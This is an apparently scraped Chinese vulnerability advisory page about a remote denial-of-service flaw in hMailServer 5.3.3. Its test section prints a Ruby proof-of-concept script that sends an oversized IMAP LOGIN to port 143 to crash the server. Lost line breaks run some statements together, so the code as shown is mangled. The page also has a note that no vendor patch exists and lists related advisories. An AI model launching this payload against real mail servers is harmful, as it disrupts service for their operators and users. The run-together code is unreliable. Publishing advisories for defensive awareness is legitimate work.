发布日期:2012-10-28
更新日期:2012-10-31受影响系统:
hmailserver hmailserver 5.3.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56319hMailServer是Windows下的免费电子邮件服务器软件。hMailServer 5.3.3及其他版本存在远程拒绝服务漏洞,成功利用后可允许攻击者造成服务器崩溃。<*来源:john smith (edward11@postmaster.co.uk)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/rubyrequire "socket"s = TCPSocket.open(ARGV[0], 143)cmd = "a LOGIN "
address = "A" * 32765
password = " AAAAAAAA
"
logout = "a LOGOUT
"pkt = cmd
pkt << address
pkt << password
pkt << logouts.write(pkt)while resp = s.gets
p resp
ends.close建议:
--------------------------------------------------------------------------------
厂商补丁:hmailserver
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:www.hmailserver.comlibfpx "Free_All_Memory()"函数双重释放远程代码执行漏洞DotA OpenStats "id"参数SQL注入漏洞相关资讯 远程拒绝服务漏洞 hMailServer安全漏洞 hMailServer
- Microsoft Windows NFS Server 空 (02/18/2013 19:24:30)
- Firefly Media Server firefly.exe (12/21/2012 20:00:19)
- expat expat/lib/xmlparse.c内存泄 (11/19/2012 19:17:27)
| - IDA Pro "ELF"文件远程拒绝服务漏 (12/22/2012 09:27:28)
- Adobe ColdFusion 远程拒绝服务漏 (11/21/2012 05:09:02)
- expat XML解析器哈希冲突远程拒绝 (11/19/2012 19:16:51)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
-
|